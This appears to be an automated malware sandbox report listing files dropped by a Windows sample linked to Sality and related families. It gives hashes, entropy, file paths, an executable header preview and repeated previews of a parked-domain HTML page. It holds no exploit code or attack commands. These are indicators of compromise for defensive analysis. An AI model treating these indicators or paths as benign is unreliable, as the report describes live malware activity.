                                                                                                                                                                                                                                                                          No context
Match: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Associated sample name / URL, detection, threat name:
• n5h5BaL8q0.exe, malicious, Sality, XWorm
• PfBjDhHzvV.exe, malicious, Metasploit, Sality
• 942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe, malicious, Bdaejec
• weH771UOWv.exe, malicious, Sality
• #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, malicious, Bdaejec, Sality
• a4#Uff09.exe, malicious, Bdaejec, Sality
• aspweb.exe, malicious, Sality
• aspweb88.exe, malicious, Unknown
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4210216
Entropy (8bit): 6.5030627280414235
Encrypted: false
SSDEEP: 49152:4pawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BA:xehFLvTQDpB5oSOmlBm
MD5: 69222B8101B0601CC6663F8381E7E00F
SHA1: DC1F4774F3104DEA6A50646D6C11EFEFD2A29169
SHA-256: F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
SHA-512: 03493D5105A3A0E8C95E6E0AC8D7F814FF075FE9D36C389067E021D55B4D75CA3BDD4D688EFA9B00D8A5E84513FF99774C2A4C9B30CC89FB8FF94154BFEB32A9
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: n5h5BaL8q0.exe, Detection: malicious
• Filename: PfBjDhHzvV.exe, Detection: malicious
• Filename: 942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe, Detection: malicious
• Filename: weH771UOWv.exe, Detection: malicious
• Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious
• Filename: a4#Uff09.exe, Detection: malicious
• Filename: aspweb.exe, Detection: malicious
• Filename: aspweb88.exe, Detection: malicious
Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................A......<A...`..........................................'3......+3.P.....8......P6..e....@.((....A. 1..h.2.T.....................2.(...P"-.@............33.......3. ....................text...E.,.......,................. ..`.rdata..$#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc.........8.......6.............@..@.reloc.. 1....A..2....?.............@..B........................................................
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type: HTML document, ASCII text, with very long lines (361)
Category: dropped
Size (bytes): 2265
Entropy (8bit): 5.6496878055806175
Encrypted: false
SSDEEP: 48:+mazpFwSNVUuMqUtmtE9VC7h6cBBDH3M7ioaxyi6CV7MTf992wP:IN2uUh9VUdX6i1yi7Sl928
MD5: 7B9DC7CA1EB7C8432259768397C097B7
SHA1: 1C53A23AEFE38CD06E96442E70CA683E86E8FB10
SHA-256: B9AB734043A5B1AFA6AB8B77B0D957BB1F61BA909203F4D664026C31E94C3E03
SHA-512: E8AE56D7E557543337A465EFA1DCF65264CDA1769896B4E6B8480F32131D1C6C0F30085C33A91EB2F039EAB34E33981634A79F9E7B12D0229C1C6C935B9B3F5A
Malicious: false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE3NS42NjcyOjQyZTM1MTJjNzdlYmM1YjBiMzQxYzgwNDQ2NDA4ZDA3ODA1MjhmY2ZjOTM3YTIwMDBkOWMyNjI3OTIwNTNmOTM6NjcxMjNiYWZhMmUzMw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JhZmEyZGYxfHx8MTcyOTI0ODE3
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type: HTML document, ASCII text, with very long lines (357)
Category: dropped
Size (bytes): 2261
Entropy (8bit): 5.652949460417062
Encrypted: false
SSDEEP: 48:+mazpFwd0MqUtmtE9VCYdxPhM7ioaxyi6CVVCMTf992wP:tdAUh9VVgi1yi7V7l928
MD5: D3C7F2399B76A0FC796393A0E34DEB4D
SHA1: C0E4C7921DCEB8060597A796568B7EDE5F98B191
SHA-256: DD0C6C04C966F1BC7C401361F2E6D0ACF3480E0E9FA578692E9E346A67AA7ED1
SHA-512: 229A314A8DDA92B3B503C6247A2CB9DCAAE0848D8B85E5DF8C2E467A8ED071A6B6189ADCE777E71D7BD77E3BC4155C0D6223B19A854C9A7831B3F288BE667F95
Malicious: false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIyNC43ODc5OjRjNDdkOGRjNDgwNjFlNmJmZDFkM2ZjMGJlMmJmZmIxNGYzOTAxMjI1NGM3ZWZkNGMxZWU3YmQyNjQxMzcxYjc6NjcxMjNiZTBjMDVjOQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JlMGMwNTkwfHx8MTcyOTI0ODIy
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.641297642746322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFAPTZMqUtmtE9VCrPcB6c1o3M7ioaxyi6CVsMTf992wP:9PT7Uh9VPM4ni1yi7Nl928
                                                                                                                                                                                                                                                                                          MD5:7A85D4A8F2A9D0941EFDBED182EF150A
                                                                                                                                                                                                                                                                                          SHA1:BA578A8840E64A2CCDCF133359DB954FC2A1393B
                                                                                                                                                                                                                                                                                          SHA-256:EA2435AF0A8CB4D91C01CBE31878A65C4A32B88AC129920C25FBECE0F9C6A7EB
                                                                                                                                                                                                                                                                                          SHA-512:3BA4DF42BEF40E7C0FB280C0C55FD6DE9756FBD0777EDA9E7C465DE36D93D4BE6ABD4DC7028C469E47130B2DD05AFE13787912476063515795BA43CAD0294967
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE5Mi42MzU3OmY5OGYxNjExYTRlMTA2ZDdiMGMyYjIyNzE2OWMxNDUyNmU4ODg2OGZjYzE5OTcyMzEzYWYxNDIxZGQ4YWJjMGU6NjcxMjNiYzA5YjMyNg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JjMDliMmQ5fHx8MTcyOTI0ODE5
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.653477497800643
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFwIlMqUtmtE9VCeIcBwU3M7ioaxyi6CV61MTf992wP:LI3Uh9V3ezi1yi7Ll928
                                                                                                                                                                                                                                                                                          MD5:D47CA73FA6B17517CA1A7E035C3377AE
                                                                                                                                                                                                                                                                                          SHA1:6FA083043CBF0A6A9511D69BE5AEEE82C0E18589
                                                                                                                                                                                                                                                                                          SHA-256:0F3120E4020E72C93004C68A3993A52CB41409919DC06D582FAA426653FD1456
                                                                                                                                                                                                                                                                                          SHA-512:892687A70089EA29B61A1ECD9AB3264E56EEE354ECF5F244FFC176FEE8ABE7AA388CA78A4E70A81B90D90C56F10A8A294DB18A91397E976388B12B1A3E50EB17
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI3My42NjM4OjYwMDkyN2FiZmRiYzBhNWI4Y2QwYzIyZDE3ZjZhMjQyMjA4YmZmYzE5MmQyZjFiYTM4MDJjNTExOWMxODk0Njk6NjcxMjNjMTFhMjBlNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MxMWEyMGEwfHx8MTcyOTI0ODI3
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6496765740040775
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFNMqUtmtE9VCAhbcBQwgm3M7ioaxyi6CV7MTf992wP:WUh9Vsqjhi1yi7Sl928
                                                                                                                                                                                                                                                                                          MD5:A8AC3A613F8991EA4ED519DD24AB4D86
                                                                                                                                                                                                                                                                                          SHA1:29F6E04F42C5BF8434EEDAB0CB238B187A3FA671
                                                                                                                                                                                                                                                                                          SHA-256:09D08E18FB7F2F84C4BC26516530E44DF9DEFEF7AAF069C8021AFA5B820D05CE
                                                                                                                                                                                                                                                                                          SHA-512:24515ED77ED3F1281286704378A96A02DFC479A9AE2E500302F8637997631012940ED551A5DF373ACC12DDAF11F2C894C2B32A2AF5F57E6E75DE0D2B3ED92A95
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE1MC4xMTEyOmM5OWYzY2UwNjliMzQ4MDQ1ZTA0ZTY5OTFjZGY3NmU3NmUyYzI5MmMwOGY3ODFjN2I5NWMyYjU0MTM2YjIxMDU6NjcxMjNiOTYxYjI3Ng==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I5NjFiMjM2fHx8MTcyOTI0ODE1
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (357)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.643452822066541
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFGobMqUtmtE9VCTtd6M7ioaxyi6CVMYQnMTf992wP:QpUh9VMi1yi7MYQel928
                                                                                                                                                                                                                                                                                          MD5:C5A926CA8AFB2642CACE1E601D9E5CF4
                                                                                                                                                                                                                                                                                          SHA1:6CDF3DF52B35283D05B5C5CE1B422E41F4E6C958
                                                                                                                                                                                                                                                                                          SHA-256:74F88EE0A30EC4FADB744E180AE79571959BDC3D62C9A5F561A4D31A76F980C0
                                                                                                                                                                                                                                                                                          SHA-512:42B8AE7D4919681C9901457036A0AFD951036449C793A73A9F5B17DEF51CB5A845484C522C3FB4324E0D749DBFC44FF4EF61412059A50767EFE8618DE00778A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI2MC42MzI2OmU1ZTBkZWExYTllOWIwMmZlODA2MDQ5NTM2MzM0ZGEwM2FjYWRlZWQ3NTczMTMzMWIwZDUxOTA3NWU0MTg1NWY6NjcxMjNjMDQ5YTcwMw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MwNDlhNmQxfHx8MTcyOTI0ODI2
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.644033992642338
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFko0MqUtmtE9VCKcBda3M7ioaxyi6CVwAEMTf992wP:7FUh9VKvFi1yi7wAll928
                                                                                                                                                                                                                                                                                          MD5:C2CCB01C0454A96DE5CB0D589283F74B
                                                                                                                                                                                                                                                                                          SHA1:A63DB87742467DE378D0F32242EADD7D6C587877
                                                                                                                                                                                                                                                                                          SHA-256:71A73EEDC5EC3353ED03ABC5A0532801A177C8C76DE97065FFF06E2682AADBE1
                                                                                                                                                                                                                                                                                          SHA-512:0C4D43C69751D25E1F20632556F2FF5A4EF579FD728F47D321A0AB70A3823CAC1343BDF7725852372F6320CA33DD84BA277A01337F10E7F966BEA028B2C238A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE4Ni43ODkxOjE5MWJiOTk1MDNhNzllMTAyOTU5MmZiNDY3NmVjNjg1ZTk4NzhkMDVhN2YzOTU0MTA0MTk2NTk2N2E3MGE0ZTk6NjcxMjNiYmFjMGE2Ng==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JiYWMwYTM5fHx8MTcyOTI0ODE4
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.646891353429371
Encrypted:false
SSDEEP:48:+mazpFwMqUtmtE9VC+y5cBrT3M7ioaxyi6CVqTMTf992wP:pUh9VFwi1yi7qKl928
MD5:55DF63F8653B2855DB913418AC8D8E5C
SHA1:D33A1F8984BA7DD52D6012E55C92E5ED6628F276
SHA-256:9D684C4B2B67FF99A9BD367C634B958E589757740664545DA6255494B733EDAF
SHA-512:8A9EDC61C288EAD3609BE336423C88D8A73E219C77847C8B101E2934D326AA428D6FB72696E61792F7943428AF10C580AFD44F64EAD372813C59ED24055A6826
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE4MS40MTM2OjFmZWJlMzc1ZTI3OWEzNDZkNmM3YjExNWJjY2RhNmE5Y2FkYzY4YmQxYTUwOTVkYmJmZTcwOTRmYzNlYjExODc6NjcxMjNiYjU2NGZhMg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JiNTY0ZjRkfHx8MTcyOTI0ODE4

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.640501547020023
Encrypted:false
SSDEEP:48:+mazpFdEkMqUtmtE9VCSqdfcBs3M7ioaxyi6CVi+KMTf992wP:7wUh9VVqq5i1yi7xl928
MD5:0625B11B4D3D9BCA7EDB8C57E71C8275
SHA1:AEAC1E7FB773D377902DCE3ED4D5628E3070A417
SHA-256:FDAFBFFF851F29B0D023B7D2A592724C0DFC1C8536E060B31E960530E694A304
SHA-512:F6647EC28AC29C1BF6FE9685D9AD5B36761C7E481ADD75161125608A7F70F06F183701362EA8615802F05DEF46BEFFAF215D10531B83D348B666753AC2D67D4F
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE5OS41MzI0OjQ0OTcwNWJlOTdhZDYxOGIyM2YzNDc1N2I3MGNjMmZjYjA4YmM1YThkZDgxNGM2ZGFhZTUyN2JhNTNhZjg2YTY6NjcxMjNiYzc4MWY4Yw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JjNzgxZjQ4fHx8MTcyOTI0ODE5

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2261
Entropy (8bit):5.648448044755032
Encrypted:false
SSDEEP:48:+mazpFB9JMqUtmtE9VC8u7ScBv3M7ioaxyi6CV9NMTf992wP:OrUh9VziVki1yi79kl928
MD5:83ADB970C1E063C3F0B165B873D313D7
SHA1:749F49E90D69527250697837539A8971470144D4
SHA-256:0DE8C7A6AB8844C26F2C74096835367002DA775C31E8E5BA00E39918A6EBC4B6
SHA-512:6C49B99F203CC5F4189312355F290E106344977C4DED3CFB80D0E8FA216C04BB1C2632A3968F75D6710419111B2DF3912AA637691B92D74F238D913371E2387F
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI1NC42MTI6YjdlMDZlYjdjOTQyOGRjMjg3ZWQyNWFjYWJjZTc4YzgxYzRhNDk5Y2QyODI0Y2JiMGNkZTgyYzk5MzE5YTQ3Njo2NzEyM2JmZTk1Njdl';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JmZTk1NjQ1fHx8MTcyOTI0ODI1NC44

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.65365913496466
Encrypted:false
SSDEEP:48:+mazpFPBgMqUtmtE9VCYtcBQwY3M7ioaxyi6CVZn0MTf992wP:XUh9Vbini1yi7FVl928
MD5:2BC75C9B48FCF746FD2B696251BC7DDD
SHA1:EBCA366415785190EFC672B0548EC6C5F1DF7B83
SHA-256:2C41B88753084CFDC17BE88F357D5D752A03D537F065CA571F5C7D54F9C02F35
SHA-512:DB4F0415C84CA77C26382038C2A5AC196CB6AC6F1A7AD83D8F38169DAF54CBE1860E5DD99E2AB45B3C30A6A53EA37246A0F53BC4011DB4355544F6506870D404
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEzMi44ODYxOjA3MGQwNThjNTg2YTg1MGUwNjdiNjAzZGMyYjU1NGNjZTU2NTQzOTkyYzgxMjYzY2QwNTMzYTY2YmZmY2VhZWI6NjcxMjNiODRkODU2OQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I4NGQ4NTNjfHx8MTcyOTI0ODEz

Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.6502419620932685
Encrypted:false
SSDEEP:48:+mazpFLaMqUtmtE9VCKcBf3M7ioaxyi6CV9MTf992wP:eKUh9VeEi1yi7Ul928
MD5:60BE7D14C6C89C0D2E72B11D61FFCE96
SHA1:8AFC7D23FFCFC7D69A15CBF6EF97DA6DD5EADFAA
SHA-256:E01C68EDD079A88BA8A50F5BBAFCCC417E0A13040E217DC733863FF395C24EC1
SHA-512:787D01C93A36842732ED259229BE1EFE16E164377BE7773F2714CF4D39CEBB038E8A3F6674130DE52B9A25B72D917AA600C3F0D42D9D69BAC713083572CB6748
Malicious:false
Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE2OS4zMTY0OjMyYjM3OGExYTcxNWIyNWU0MDBjMzFjYmIzNzU1Y2RkYzVhYTk1MTBjYTgzY2ZkNzYyY2M0ZGE0ZjYwM2VkZDA6NjcxMjNiYTk0ZDNmZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JhOTRkM2JkfHx8MTcyOTI0ODE2

Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.653970415083116
Encrypted:false
SSDEEP:48:+mazpF3YPJMqUtmtE9VCEvcBX3M7ioaxyi6CV1MTf992wP:yYTUh9V5Eki1yi7Ml928
MD5:D14B75FD0CF22579DA520907E004AFB4
SHA1:091D120574576F9692B6FEBF739E51700DAB2139
SHA-256:90F078BF5B085D002F1DF52446099C2518BA2DC15F51959871BC77037361F844
SHA-512:F91EAC651ABBAC9E554EC77C58D80B829EC03BC9281B86B3A8AC871A542A36694E58E320F8687AF92097BC7F19170BC218509C8A09288EDB99FD95C592AAB269
Malicious:false
